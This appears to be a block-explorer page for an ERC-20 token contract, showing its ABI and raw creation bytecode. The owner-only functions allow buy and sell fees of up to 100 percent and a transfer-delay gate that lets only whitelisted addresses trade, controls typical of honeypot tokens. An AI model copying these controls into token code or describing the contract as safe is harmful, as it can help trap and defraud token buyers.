- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"totalBuyFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"buyMktFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"buyDevFee","type":"uint256"}],"name":"BuyFeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"DisabledTransferDelay","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"LimitsRemoved","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxTx","type":"uint256"}],"name":"MaxTxUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxWallet","type":"uint256"}],"name":"MaxWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"totalSellFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellMktFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellDevFee","type":"uint256"}],"name":"SellFeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"},{"indexed":false,"internalType":"uint256","name":"swapBackValueMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"swapBackValueMax","type":"uint256"}],"name":"SwapbackSettingsUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"TradingEnabled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devReceiverUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"lpReceiverUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"mktReceiverUpdated","type":"event"},{"inputs":[],"name":"addCatLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getFeeInfo","outputs":[{"internalType":"uint256","name":"_totalBuyFee","type":"uint256"},{"internalType":"uint256","name":"_buyMktFee","type":"uint256"},{"internalType":"uint256","name":"_buyDevFee","type":"uint256"},{"internalType":"uint256","name":"_totalSellFee","type":"uint256"},{"internalType":"uint256","name":"_sellMktFee","type":"uint256"},{"internalType":"uint256","name":"_sellDevFee","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getFeeWallet","outputs":[{"internalType":"address","name":"_mktReceiver","type":"address"},{"internalType":"address","name":"_devReceiver","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getLimitsInfo","outputs":[{"internalType":"bool","name":"_limitsInEffect","type":"bool"},{"internalType":"bool","name":"_transferDelayEnabled","type":"bool"},{"internalType":"uint256","name":"_maxWallet","type":"uint256"},{"internalType":"uint256","name":"_maxTx","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getSwapbackInfo","outputs":[{"internalType":"bool","name":"_swapbackEnabled","type":"bool"},{"internalType":"uint256","name":"_swapBackValueMin","type":"uint256"},{"internalType":"uint256","name":"_swapBackValueMax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_target","type":"address"}],"name":"getValues","outputs":[{"internalType":"bool","name":"_isFeeExempt","type":"bool"},{"internalType":"bool","name":"_isTxLimitExempt","type":"bool"},{"internalType":"bool","name":"_automatedMarketMakerPairs","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isLive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeCatLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"setBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setDelay","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setDelayOn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"setDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"setMarketWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"setSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"},{"internalType":"uint256","name":"_min","type":"uint256"},{"internalType":"uint256","name":"_max","type":"uint256"}],"name":"setSwapBackSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"setTxLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"setWalletLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startCatTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60806040526007805460ff60a81b19169055600a805462ffffff19166001179055600f805460ff191690553480156200003757600080fd5b506040518060400160405280600d81526020016c11dc9d5b5c1cdd195c8810d85d609a1b8152506040518060400160405280600981526020016823a92aa6a829aa22a960b91b8152508160039081620000919190620005ae565b506004620000a08282620005ae565b505050620000bd620000b76200027760201b60201c565b6200027b565b6000620000cd6012600a6200078f565b620000dd906305f5e100620007a7565b90506001600081816103e8620000f5866014620007a7565b620001019190620007c1565b600c556103e862000114866014620007a7565b620001209190620007c1565b600b55620186a062000134866001620007a7565b620001409190620007c1565b6008556103e862000153866002620007a7565b6200015f9190620007c1565b60095560128490556013839055620001788385620007e4565b60115560158290556016819055620001918183620007e4565b60145560108054336001600160a01b03199091168117909155600f8054610100600160a81b0319167466b96f487de1dad0cfb8a835fd086b875c1dd45000179055620001df906001620002cd565b620001ec306001620002cd565b620001fb61dead6001620002cd565b600f54620002199061010090046001600160a01b03166001620002cd565b620002263360016200037c565b620002333060016200037c565b6200024261dead60016200037c565b600f54620002609061010090046001600160a01b031660016200037c565b6200026c338662000420565b5050505050620007fa565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b031633146200031c5760405162461bcd60e51b81526020600482018190526024820152600080516020620033d783398151915260448201526064015b60405180910390fd5b6001600160a01b038216600081815260196020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df791015b60405180910390a25050565b6005546001600160a01b03163314620003c75760405162461bcd60e51b81526020600482018190526024820152600080516020620033d7833981519152604482015260640162000313565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc92910162000370565b6001600160a01b038216620004785760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640162000313565b80600260008282546200048c9190620007e4565b90915550506001600160a01b03821660009081526020819052604081208054839290620004bb908490620007e4565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200053557607f821691505b6020821081036200055657634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200050557600081815260208120601f850160051c81016020861015620005855750805b601f850160051c820191505b81811015620005a65782815560010162000591565b505050505050565b81516001600160401b03811115620005ca57620005ca6200050a565b620005e281620005db845462000520565b846200055c565b602080601f8311600181146200061a5760008415620006015750858301515b600019600386901b1c1916600185901b178555620005a6565b600085815260208120601f198616915b828110156200064b578886015182559484019460019091019084016200062a565b50858210156200066a5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620006d1578160001904821115620006b557620006b56200067a565b80851615620006c357918102915b93841c939080029062000695565b509250929050565b600082620006ea5750600162000789565b81620006f95750600062000789565b81600181146200071257600281146200071d576200073d565b600191505062000789565b60ff8411156200073157620007316200067a565b50506001821b62000789565b5060208310610133831016604e8410600b841016171562000762575081810a62000789565b6200076e838362000690565b80600019048211156200078557620007856200067a565b0290505b92915050565b6000620007a060ff841683620006d9565b9392505050565b80820281158282048414176200078957620007896200067a565b600082620007df57634e487b7160e01b600052601260045260246000fd5b500490565b808201808211156200078957620007896200067a565b612bcd806200080a6000396000f3fe60806040526004361061021d5760003560e01c8063715018a611610123578063a8aa1b31116100ab578063d08893581161006f578063d0889358146106fe578063dd62ed3e1461071e578063e884f26014610764578063f1d5f51714610779578063f2fde38b1461079957600080fd5b8063a8aa1b3114610664578063a9059cbb14610684578063b2d8f208146106a4578063b8f7a665146106c4578063c0246668146106de57600080fd5b8063924f364d116100f2578063924f364d1461057c57806395d89b41146105ef5780639a7a23d6146106045780639fd8234e14610624578063a457c2d71461064457600080fd5b8063715018a6146105005780637571336a1461051557806376c829e9146105355780638da5cb5b1461054a57600080fd5b806350846ede116101a6578063598ae6e411610175578063598ae6e41461040b5780635c85974f1461044a5780636455acf21461046a5780636f013db91461047f57806370a08231146104ca57600080fd5b806350846ede14610389578063543322661461039e5780635459060d146103be57806356224ea7146103f657600080fd5b806318160ddd116101ed57806318160ddd146102ee5780631f53ac021461030d57806323b872dd1461032d578063313ce5671461034d578063395093511461036957600080fd5b806202eab71461022957806306fdde031461027a578063095ea7b31461029c57806314d178ac146102cc57600080fd5b3661022457005b600080fd5b34801561023557600080fd5b50601154601254601354601454601554601654604080519687526020870195909552938501929092526060840152608083015260a082015260c0015b60405180910390f35b34801561028657600080fd5b5061028f6107b9565b60405161027191906126e4565b3480156102a857600080fd5b506102bc6102b7366004612747565b61084b565b6040519015158152602001610271565b3480156102d857600080fd5b506102ec6102e7366004612788565b610862565b005b3480156102fa57600080fd5b506002545b604051908152602001610271565b34801561031957600080fd5b506102ec61032836600461280c565b61090c565b34801561033957600080fd5b506102bc610348366004612829565b610993565b34801561035957600080fd5b5060405160128152602001610271565b34801561037557600080fd5b506102bc610384366004612747565b610a49565b34801561039557600080fd5b506102ec610a85565b3480156103aa57600080fd5b506102ec6103b936600461280c565b610afc565b3480156103ca57600080fd5b50600f54601054604080516101009093046001600160a01b039081168452909116602083015201610271565b34801561040257600080fd5b506102ec610b8e565b34801561041757600080fd5b50600754600854600954600160a81b90920460ff1691604080519315158452602084019290925290820152606001610271565b34801561045657600080fd5b506102ec61046536600461286a565b610c40565b34801561047657600080fd5b506102ec610d17565b34801561048b57600080fd5b506104a8600a54600b54600c5460ff808416946101009094041692565b6040805194151585529215156020850152918301526060820152608001610271565b3480156104d657600080fd5b506102ff6104e536600461280c565b6001600160a01b031660009081526020819052604090205490565b34801561050c57600080fd5b506102ec610fce565b34801561052157600080fd5b506102ec610530366004612883565b611004565b34801561054157600080fd5b506102ec61108e565b34801561055657600080fd5b506005546001600160a01b03165b6040516001600160a01b039091168152602001610271565b34801561058857600080fd5b506105d061059736600461280c565b6001600160a01b0316600090815260196020908152604080832054601a835281842054601b90935292205460ff92831693918316921690565b6040805193151584529115156020840152151590820152606001610271565b3480156105fb57600080fd5b5061028f6110ef565b34801561061057600080fd5b506102ec61061f366004612883565b6110fe565b34801561063057600080fd5b506102ec61063f3660046128b8565b6111ba565b34801561065057600080fd5b506102bc61065f366004612747565b6112ad565b34801561067057600080fd5b50600754610564906001600160a01b031681565b34801561069057600080fd5b506102bc61069f366004612747565b611346565b3480156106b057600080fd5b506102ec6106bf3660046128b8565b611353565b3480156106d057600080fd5b50600f546102bc9060ff1681565b3480156106ea57600080fd5b506102ec6106f9366004612883565b61143d565b34801561070a57600080fd5b506102ec6107193660046128da565b6114bf565b34801561072a57600080fd5b506102ff61073936600461290d565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561077057600080fd5b506102ec61165d565b34801561078557600080fd5b506102ec61079436600461286a565b6116bf565b3480156107a557600080fd5b506102ec6107b436600461280c565b61179b565b6060600380546107c890612946565b80601f01602080910402602001604051908101604052809291908181526020018280546107f490612946565b80156108415780601f1061081657610100808354040283529160200191610841565b820191906000526020600020905b81548152906001019060200180831161082457829003601f168201915b5050505050905090565b6000610858338484611836565b5060015b92915050565b6005546001600160a01b031633146108955760405162461bcd60e51b815260040161088c9061297a565b60405180910390fd5b60005b828110156109065781600e60008686858181106108b7576108b76129af565b90506020020160208101906108cc919061280c565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806108fe816129db565b915050610898565b50505050565b6005546001600160a01b031633146109365760405162461bcd60e51b815260040161088c9061297a565b6010546040516001600160a01b03918216918316907fc246820312f1be47e3958d661d0c150c01b96d1fe3df1e38edd76693ffa8122b90600090a3601080546001600160a01b0319166001600160a01b0392909216919091179055565b60006109a084848461195a565b6001600160a01b03841660009081526001602090815260408083203384529091529020548281108015906109d45750600083115b610a315760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161088c565b610a3e8533858403611836565b506001949350505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610858918590610a809086906129f4565b611836565b6005546001600160a01b03163314610aaf5760405162461bcd60e51b815260040161088c9061297a565b600f805460ff191660011790556007805460ff60a81b1916600160a81b17905560405142907fb3da2db3dfc3778f99852546c6e9ab39ec253f9de7b0847afec61bd27878e92390600090a2565b6005546001600160a01b03163314610b265760405162461bcd60e51b815260040161088c9061297a565b600f546040516001600160a01b036101009092048216918316907fa90d7598849ffffb63cb2a2b23157fa85704d50370070de404a308243fe1daec90600090a3600f80546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6005546001600160a01b03163314610bb85760405162461bcd60e51b815260040161088c9061297a565b600a5462010000900460ff16610bfe5760405162461bcd60e51b815260206004820152600b60248201526a1ddb08191a5cd8589b195960aa1b604482015260640161088c565b600a805462ff000019169055601e601281905560006013819055610c21916129f4565b6011556028601581905560006016819055610c3b916129f4565b601455565b6005546001600160a01b03163314610c6a5760405162461bcd60e51b815260040161088c9061297a565b6002811015610cbb5760405162461bcd60e51b815260206004820181905260248201527f43616e6e6f7420736574206d61785478206c6f776572207468616e20302e3225604482015260640161088c565b6103e8610cc760025490565b610cd19083612a07565b610cdb9190612a1e565b600c8190556040519081527fff3dd5e80294197918c284bbfc3dadd97d0b40ce92106110946329088f80068a906020015b60405180910390a150565b6005546001600160a01b03163314610d415760405162461bcd60e51b815260040161088c9061297a565b600680546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d908117909155610d773082600019611836565b806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610db5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dd99190612a40565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e26573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e4a9190612a40565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610e97573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ebb9190612a40565b600780546001600160a01b0319166001600160a01b03929092169182179055610ee5906001611004565b600754610efc906001600160a01b03166001612243565b806001600160a01b031663f305d7194730610f2c306001600160a01b031660009081526020819052604090205490565b600080610f416005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610fa9573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109069190612a5d565b6005546001600160a01b03163314610ff85760405162461bcd60e51b815260040161088c9061297a565b6110026000612297565b565b6005546001600160a01b0316331461102e5760405162461bcd60e51b815260040161088c9061297a565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc9291015b60405180910390a25050565b6005546001600160a01b031633146110b85760405162461bcd60e51b815260040161088c9061297a565b600a805460ff1916905560405142907ff4eaa75eae08ae80c3daf791438dac1cff2cfd3b0bad2304ec7bbb067e50261690600090a2565b6060600480546107c890612946565b6005546001600160a01b031633146111285760405162461bcd60e51b815260040161088c9061297a565b6007546001600160a01b03908116908316036111ac5760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000606482015260840161088c565b6111b68282612243565b5050565b6005546001600160a01b031633146111e45760405162461bcd60e51b815260040161088c9061297a565b601582905560168190556111f881836129f4565b60148190556064101561125f5760405162461bcd60e51b815260206004820152602960248201527f546f74616c2073656c6c206665652063616e6e6f7420626520686967686572206044820152687468616e203130302560b81b606482015260840161088c565b601454601554601654604080519384526020840192909252908201527fcb5f36df892836a2eaedc349de29a7581176990398ee185d16eaa8f6c1abd8f1906060015b60405180910390a15050565b3360009081526001602090815260408083206001600160a01b03861684529091528120548281101561132f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161088c565b61133c3385858403611836565b5060019392505050565b600061085833848461195a565b6005546001600160a01b0316331461137d5760405162461bcd60e51b815260040161088c9061297a565b6012829055601381905561139181836129f4565b6011819055606410156113f75760405162461bcd60e51b815260206004820152602860248201527f546f74616c20627579206665652063616e6e6f7420626520686967686572207460448201526768616e203130302560c01b606482015260840161088c565b601154601254601354604080519384526020840192909252908201527f38513c502b0ab4834ac1df9502b76f75dcf7092469782cfd0db7fe664388e25e906060016112a1565b6005546001600160a01b031633146114675760405162461bcd60e51b815260040161088c9061297a565b6001600160a01b038216600081815260196020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df79101611082565b6005546001600160a01b031633146114e95760405162461bcd60e51b815260040161088c9061297a565b60018210156115575760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e604482015273101817181892903a37ba30b61039bab838363c9760611b606482015260840161088c565b818110156115ba5760405162461bcd60e51b815260206004820152602a60248201527f6d6178696d756d20616d6f756e742063616e7420626520686967686572207468604482015269616e206d696e696d756d60b01b606482015260840161088c565b6007805460ff60a81b1916600160a81b851515021790556002546127109083906115e49190612a07565b6115ee9190612a1e565b600855612710816115fe60025490565b6116089190612a07565b6116129190612a1e565b600955604080518415158152602081018490529081018290527f52cd2cdb42ff0eeec9362d7ed5b04f64c8d022697128b5378fc51cea7e63c7799060600160405180910390a1505050565b6005546001600160a01b031633146116875760405162461bcd60e51b815260040161088c9061297a565b600a805461ff001916905560405142907f26e776fcf7ca20aa79b5b946e9b5111f47205539ece9d7a7995271dd6a8b5bad90600090a2565b6005546001600160a01b031633146116e95760405162461bcd60e51b815260040161088c9061297a565b60058110156117465760405162461bcd60e51b8152602060048201526024808201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015263302e352560e01b606482015260840161088c565b6103e861175260025490565b61175c9083612a07565b6117669190612a1e565b600b8190556040519081527f12528a3c61e0f3b2d6fc707a9fc58b1af86e252cad0d7f4c154ebeabb162dace90602001610d0c565b6005546001600160a01b031633146117c55760405162461bcd60e51b815260040161088c9061297a565b6001600160a01b03811661182a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161088c565b61183381612297565b50565b6001600160a01b0383166118985760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161088c565b6001600160a01b0382166118f95760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161088c565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166119805760405162461bcd60e51b815260040161088c90612a8b565b6001600160a01b0382166119a65760405162461bcd60e51b815260040161088c90612ad0565b60008111806119cd57506001600160a01b03831660009081526019602052604090205460ff165b611a245760405162461bcd60e51b815260206004820152602260248201527f416d6f756e742073686f756c642062652067726561746572207468616e207a65604482015261726f60f01b606482015260840161088c565b600a5460ff1615611f35576005546001600160a01b03848116911614801590611a5b57506005546001600160a01b03838116911614155b8015611a6f57506001600160a01b03821615155b8015611a8657506001600160a01b03821661dead14155b8015611a9c5750600754600160a01b900460ff16155b15611f3557600f5460ff16611b41576001600160a01b03831660009081526019602052604090205460ff1680611aea57506001600160a01b03821660009081526019602052604090205460ff165b611b415760405162461bcd60e51b815260206004820152602260248201527f5f7472616e736665723a3a2054726164696e67206973206e6f74206163746976604482015261329760f11b606482015260840161088c565b600a5462010000900460ff1615611be9576001600160a01b0383166000908152600e602052604090205460ff1680611b9157506001600160a01b0382166000908152600e602052604090205460ff165b611be95760405162461bcd60e51b8152602060048201526024808201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c604482015263032b217160e51b606482015260840161088c565b600a54610100900460ff1615611ced576005546001600160a01b03838116911614801590611c2557506006546001600160a01b03838116911614155b8015611c3f57506007546001600160a01b03838116911614155b15611ced57326000908152600d60205260409020544311611cda5760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a40161088c565b326000908152600d602052604090204390555b6001600160a01b0383166000908152601b602052604090205460ff168015611d2e57506001600160a01b0382166000908152601a602052604090205460ff16155b15611e0357600c54811115611d945760405162461bcd60e51b815260206004820152602660248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201526536b0bc2a3c1760d11b606482015260840161088c565b600b546001600160a01b038316600090815260208190526040902054611dba90836129f4565b1115611dfe5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b604482015260640161088c565b611f35565b6001600160a01b0382166000908152601b602052604090205460ff168015611e4457506001600160a01b0383166000908152601a602052604090205460ff16155b15611eab57600c54811115611dfe5760405162461bcd60e51b815260206004820152602760248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152661036b0bc2a3c1760c91b606482015260840161088c565b6001600160a01b0382166000908152601a602052604090205460ff16611f3557600b546001600160a01b038316600090815260208190526040902054611ef190836129f4565b1115611f355760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b604482015260640161088c565b30600090815260208190526040902054600854808210801591841015908290611f5b5750805b8015611f705750600754600160a81b900460ff165b8015611f865750600754600160a01b900460ff16155b8015611faa57506001600160a01b0385166000908152601b602052604090205460ff165b8015611fcf57506001600160a01b03861660009081526019602052604090205460ff16155b8015611ff457506001600160a01b03851660009081526019602052604090205460ff16155b15612023576007805460ff60a01b1916600160a01b179055612015846122e9565b6007805460ff60a01b191690555b6007546001600160a01b03871660009081526019602052604090205460ff600160a01b90920482161591168061207157506001600160a01b03861660009081526019602052604090205460ff165b1561207a575060005b600754600090600160a81b900460ff1680156120a05750600754600160a01b900460ff16155b1561222e57811561222e576001600160a01b0387166000908152601b602052604090205460ff1680156120d557506000601454115b15612163576120fa60646120f4601454896123db90919063ffffffff16565b906123ee565b90506014546016548261210d9190612a07565b6121179190612a1e565b6018600082825461212891906129f4565b909155505060145460155461213d9083612a07565b6121479190612a1e565b6017600082825461215891906129f4565b909155506122109050565b6001600160a01b0388166000908152601b602052604090205460ff16801561218d57506000601154115b15612210576121ac60646120f4601154896123db90919063ffffffff16565b9050601154601354826121bf9190612a07565b6121c99190612a1e565b601860008282546121da91906129f4565b90915550506011546012546121ef9083612a07565b6121f99190612a1e565b6017600082825461220a91906129f4565b90915550505b8015612221576122218830836123fa565b61222b8187612b13565b95505b6122398888886123fa565b5050505050505050565b6001600160a01b0382166000818152601b6020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a